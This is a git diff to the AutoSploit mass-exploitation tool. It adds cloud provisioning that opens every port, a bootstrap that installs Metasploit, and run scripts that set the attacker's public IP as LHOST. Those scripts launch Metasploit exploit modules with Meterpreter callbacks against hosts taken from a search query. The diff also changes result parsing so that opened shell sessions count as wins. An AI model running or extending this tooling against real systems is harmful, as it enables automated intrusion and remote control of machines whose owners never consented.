NullArray · Selora · Apr 9, 2018 · Apr 9, 2018 · Apr 9, 2018 · Apr 9, 2018
diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile
@@ -0,0 +1,28 @@
+# Use as a strating point to spin up a box in lightsail.
+# the vagrant-lightsail plugin is required
+# You probably also need to:
+# - Configure the ssh keys path
+# - Install and configure the aws-cli package
+
+Vagrant.configure('2') do |config|
+	config.vm.synced_folder ".", "/vagrant", type: "rsync",
+		rsync__exclude: ".git/",
+		rsync__auto: true
+
+	config.ssh.private_key_path		= '/path/to/id_rsa'
+	config.ssh.username				= 'ubuntu'
+	config.vm.box					= 'lightsail'
+	config.vm.box_url				= 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box'
+	config.vm.hostname				= 'autosploit-launcher'
+
+	config.vm.provider :lightsail do |provider, override|
+		provider.port_info		 	= [{ from_port: 0, to_port: 65535, protocol:
+		'all' }]
+		provider.keypair_name		= 'id_rsa'
+		provider.bundle_id			= 'small_1_0'
+	end
+
+	config.vm.provision "bootstrap", type: "shell", run: "once" do |s|
+		s.path	= "./bootstrap/bootstrap.sh"
+	end
+end
diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh
@@ -0,0 +1,20 @@
+#!/usr/bin/env bash
+
+
+echo "Yolosploit configurator 2.42"
+sudo apt-get --yes update
+sudo apt-get --yes upgrade
+
+echo "Installing metasploit. BE PATIENT (5 min max?)"
+wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
+chmod +x metasploit-latest-linux-x64-installer.run
+sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended
+
+echo "Installing pyhton2"
+sudo apt-get --yes install python python-pip python-virtualenv git
+
+sudo apt-get --yes install fish
+sudo chsh -s /usr/bin/fish ubuntu
+
+cd ~
+git clone https://github.com/NullArray/AutoSploit
diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+    echo "Syntax:"
+    echo -e "\t./dryrun_autosploit.sh <whitelist.txt> <search_query>"
+	exit 1
+fi
+
+WHITELIST=$1
+SEARCH_QUERY=$2
+LPORT=4444
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+
+echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \
+    --whitelist $WHITELIST -e \
+    -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \
+    --exploit-file-to-use etc/json/default_modules.json \
+    --dry-run"
+
+python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \
+    --whitelist $WHITELIST -e \
+    -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \
+    --exploit-file-to-use etc/json/default_modules.json \
+    --dry-run
diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json
@@ -146,7 +146,6 @@
      "auxiliary/admin/cisco/vpn_3000_ftp_bypass",
      "exploit/bsdi/softcart/mercantec_softcart ",
      "exploit/freebsd/misc/citrix_netscaler_soap_bof",
-     "exploit/freebsd/samba/trans2open",
      "exploit/linux/ftp/proftp_sreplace ",
      "exploit/linux/http/dcos_marathon",
      "exploit/linux/http/f5_icall_cmd",
@@ -183,7 +182,6 @@
      "exploit/linux/proxy/squid_ntlm_authenticate",
      "exploit/linux/samba/lsa_transnames_heap",
      "exploit/linux/samba/setinfopolicy_heap",
-     "exploit/linux/samba/trans2open",
      "exploit/multi/elasticsearch/script_mvel_rce",
      "exploit/multi/elasticsearch/search_groovy_script",
      "exploit/multi/http/atutor_sqli",
@@ -263,27 +261,6 @@
      "exploit/windows/smb/ipass_pipe_exec",
      "exploit/windows/smb/smb_relay",
      "auxiliary/sqli/oracle/jvm_os_code_10g",
-     "auxiliary/sqli/oracle/jvm_os_code_11g",
-     "auxiliary/fuzzers/dns/dns_fuzzer",
-     "auxiliary/fuzzers/ftp/client_ftp",
-     "auxiliary/fuzzers/ftp/ftp_pre_post",
-     "auxiliary/fuzzers/http/http_form_field",
-     "auxiliary/fuzzers/http/http_get_uri_long",
-     "auxiliary/fuzzers/http/http_get_uri_strings",
-     "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
-     "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
-     "auxiliary/fuzzers/smb/smb_create_pipe",
-     "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
-     "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
-     "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
-     "auxiliary/fuzzers/smb/smb_tree_connect",
-     "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
-     "auxiliary/fuzzers/smtp/smtp_fuzzer",
-     "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
-     "auxiliary/fuzzers/ssh/ssh_version_15",
-     "auxiliary/fuzzers/ssh/ssh_version_2",
-     "auxiliary/fuzzers/ssh/ssh_version_corrupt",
-     "auxiliary/fuzzers/tds/tds_login_corrupt",
-     "auxiliary/fuzzers/tds/tds_login_username"
+     "auxiliary/sqli/oracle/jvm_os_code_11g"
   ]
 }
diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json
@@ -0,0 +1,25 @@
+{
+  "exploits": [
+    "auxiliary/fuzzers/dns/dns_fuzzer",
+    "auxiliary/fuzzers/ftp/client_ftp",
+    "auxiliary/fuzzers/ftp/ftp_pre_post",
+    "auxiliary/fuzzers/http/http_form_field",
+    "auxiliary/fuzzers/http/http_get_uri_long",
+    "auxiliary/fuzzers/http/http_get_uri_strings",
+    "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
+    "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
+    "auxiliary/fuzzers/smb/smb_create_pipe",
+    "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
+    "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
+    "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
+    "auxiliary/fuzzers/smb/smb_tree_connect",
+    "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
+    "auxiliary/fuzzers/smtp/smtp_fuzzer",
+    "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
+    "auxiliary/fuzzers/ssh/ssh_version_15",
+    "auxiliary/fuzzers/ssh/ssh_version_2",
+    "auxiliary/fuzzers/ssh/ssh_version_corrupt",
+    "auxiliary/fuzzers/tds/tds_login_corrupt",
+    "auxiliary/fuzzers/tds/tds_login_username"
+  ]
+}
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
@@ -121,7 +121,7 @@ def start_exploit(self):
                     "setg threads 20\n"
                     "set rhost {rhost}\n"
                     "set rhosts {rhosts}\n"
-                    "run\n"
+                    "run -z\n"
                     "exit\n"
                 )
 
@@ -157,11 +157,18 @@ def start_exploit(self):
 
                     ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
                     msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)])
-                    msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)])
-                    msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)])
 
-                    win_total += len(msf_wins)
-                    fail_total += len(msf_fails)
+                    msf_wins = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[\+\]', x) or
+                                             'Meterpreter' in x or
+                                             'Session' in x or
+                                             'Sending stage' in x])
+
+                    msf_fails = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[-\]', x)])
+
+                    if len(msf_wins):
+                        win_total += 1
+                    if len(msf_fails):
+                        fail_total += 1
 
                     csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
                     csv_file.writerow([rhost,

diff --git a/run_autosploit.sh b/run_autosploit.sh
@@ -0,0 +1,16 @@
+#!/usr/bin/env bash
+
+
+if [[ $# -lt 2 ]]; then
+    echo "Syntax:"
+    echo -e "\t./run_autosploit.sh <whitelist.txt> <exposed_lport>"
+	exit 1
+fi
+
+WHITELIST=$1
+LPORT=$2
+
+LHOST=`dig +short @resolver1.opendns.com myip.opendns.com`
+TIMESTAMP=`date +%s`
+
+python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json